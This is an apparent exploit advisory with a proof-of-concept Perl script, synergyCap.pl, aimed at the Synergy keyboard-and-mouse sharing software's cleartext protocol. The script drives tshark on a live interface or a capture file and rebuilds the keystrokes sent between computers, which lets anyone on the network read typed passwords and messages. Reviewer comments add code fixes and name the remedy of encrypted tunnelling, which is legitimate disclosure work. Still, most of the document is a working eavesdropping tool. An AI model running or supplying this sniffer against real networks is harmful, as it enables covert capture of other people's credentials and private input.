# Exploit Title: Synergy Protocol cleartext weakness PoC
# Date: April 5th 2011
# Author: Sw1tCh
# Software Link: http://synergy-foss.org/
# Version: 1.4
#
# -= Info =-
# *Synergy* is *Free and Open Source Software* that lets you easily share your mouse and keyboard between multiple computers, where each computer has its own display. No special hardware is required; all you need is a local area network. Synergy is supported on Windows, Mac OS X and Linux. [Source =~ Synergy-foss.org]
#
# -= The Advisory =-
# Synergy sends all keystrokes and mouse movements in clear text. This presents a huge vulnerability because anyone capturing packets on the network can eavesdrop on all information passed between the computers.
#
# -= PoC Script =-
#!/usr/bin/perl
#
# synergyCap.pl - Developed by Sw1tCh to show the insecurity in the Synergy Desktop Sharing application
# The program works a lot better when run through a closed network of one type or another
# [such as an SSH tunnel]
# [Note: The text isn't clear. Because of the protocol, text is sent in TCP and even with protocol
# Standards, text does come out of order.]
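##########################
#
# Obligatory Shouts -> gen0cide, Scruffy, Griff, D00dl3, BilboFraggin's
#
##########################
#
# Reviewer summary of what this script does:
#   It starts tshark in verbose mode (-V) against either a capture file (-r)
#   or a network interface (-i), scans tshark's output for "Key Id:" lines,
#   and turns every numeric value below 128 into a character.  Each character
#   is printed as it is seen and the accumulated string is printed at the end.
#
#   The script needs no key material at all: the key events are already
#   readable in the dissected traffic.  The remedy is on the deployment side:
#   carry the Synergy connection only inside an encrypted tunnel (SSH port
#   forward, VPN) or use a release that encrypts the session itself.
#
# NOTE(review): the banner's original ASCII-art spacing is not recoverable
# from this listing; the words and their order are unchanged.
use constant BANNER => q{
 / / synergyCap -> Live or Forensic extractor of text passeed
 / / from computers using Synergy Screen sharing
 / <( - )> /
 / / PoC Developed by Sw1tCh 2011
 / / -> Need to work on my tshark filters...My perl is better :)
 / / Softward -> Synergy - http://synergy-foss.org/

Usage:
    - synergyCap.pl -forensic -file [FILE]
    - synergyCap.pl -live -interface [device {example eth0} ]
};

# ----- INCLUDES ----- #
# "use Switch" from the original listing is dropped: nothing in the script
# uses it, and it is a source filter that is no longer bundled with Perl.
use strict;
use warnings;
use Getopt::Long;
use Time::HiRes qw( usleep sleep );
use Term::ANSIColor qw(:constants);

# Reset colour attributes automatically after each coloured print.
local $Term::ANSIColor::AUTORESET = 1;

print BOLD BLUE BANNER;
print "\n";

my $forensic = 0;
my $live     = 0;
my $capChar  = "";

# -file and -interface are declared as plain flags (no "=s"), so Getopt::Long
# leaves the file name or device in @ARGV; it is read from $ARGV[0] below.
GetOptions(
    'forensic'  => \$forensic,
    'live'      => \$live,
    'file'      => \my $pcap_file,
    'interface' => \my $interface,
);

# Test for "defined and non-empty" rather than truth, so a file literally
# named "0" is still accepted.
my $target = $ARGV[0];
unless ( defined $target && length $target ) {
    print "ERROR : Bad file or Interface\n";
    exit 1;    # non-zero so a calling shell can tell the run failed
}

unless ( $live || $forensic ) {
    print "ERROR : No Option Specified [Live / or / Forensic \n";
    exit 1;
}

# -live takes precedence when both modes are given, as in the original.
my $mode_flag = $live ? '-i' : '-r';

# List-form pipe open: tshark is executed directly with each argument passed
# as-is.  The original built one shell command string from $ARGV[0], so shell
# metacharacters in the file or interface argument were interpreted by the
# shell.
open( my $tshark, '-|', 'tshark', $mode_flag, $target, '-V' )
    or die "Failed to open TSHARK: $!";

# The listing shows an empty "while( )", which never reads the pipe (the
# angle-bracket read was lost from the page); the handle read is restored.
while ( my $line = <$tshark> ) {

    # Take the decimal digits that follow "Key Id: " instead of numifying the
    # whole remainder of the line.
    next unless $line =~ /Key Id\x3A\s+(\d+)/;
    my $key_id = $1;

    # Only 7-bit values are turned into characters; everything else is skipped.
    next if $key_id >= 128;

    # Capture contents are untrusted: show control bytes (below 32, and DEL)
    # as \xNN so they cannot act on the analyst's terminal as escape sequences.
    my $shown =
        ( $key_id >= 32 && $key_id < 127 )
        ? chr($key_id)
        : sprintf( '\\x%02X', $key_id );

    print " " . $shown . "\n";
    $capChar .= $shown;
}

print "\n\n$capChar ";
print "\n---+ Completed +--- \n";

# Closing a pipe also reaps tshark; report a failed close or non-zero exit
# instead of ignoring it.
close($tshark)
    or warn( $!
        ? "Error closing tshark pipe: $!\n"
        : "tshark exited with status " . ( $? >> 8 ) . "\n" );

#Credits: Sw1tCh
#Shoutouts : gen0cide, Scruffy, Griff, D00dl3, BilboFraggin's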